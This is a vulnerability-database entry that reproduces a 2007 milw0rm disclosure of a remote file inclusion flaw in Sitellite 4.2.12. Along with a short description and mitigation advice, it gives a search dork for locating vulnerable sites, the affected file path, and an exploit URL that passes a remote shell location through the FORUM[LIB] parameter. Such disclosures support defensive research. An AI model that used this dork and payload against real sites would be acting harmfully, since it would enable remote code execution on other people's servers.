header-logo
Suggest Exploit
vendor:
Sitellite
by:
o0xxdark0o
N/A
CVSS
HIGH
Remote File Inclusion
Not mentioned
CWE
Product Name: Sitellite
Affected Version From: Sitellite version 4.2.12 and below
Affected Version To: Sitellite version 4.2.12
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2007

Sitellite Remote File Inclusion Vulnerability

The Sitellite application is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability to include arbitrary remote files, which may lead to remote code execution or other attacks.

Mitigation:

Apply the latest patches and updates from the vendor. Ensure that proper input validation and sanitization techniques are implemented to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

*sitellite*<http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz>
v 4.2.12
DORK : "powered by Sitellite"
FOUND BY : o0xxdark0o
           o0xxdark0o[at]msn.com
Website: http://www.sitellite.org/
DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
REMOTE FILE ICLUDE
############################################################
FILE :
PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
############################################################
EXP:
xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
?
############################################################
CODE: on line 4
<?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?>
############################################################
thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
     o0xxdark0o@msn.com

PhpDocumentor directory is .htaccess'ed

# milw0rm.com [2007-06-14]

Navigation

Suggest Exploit

Services By CQR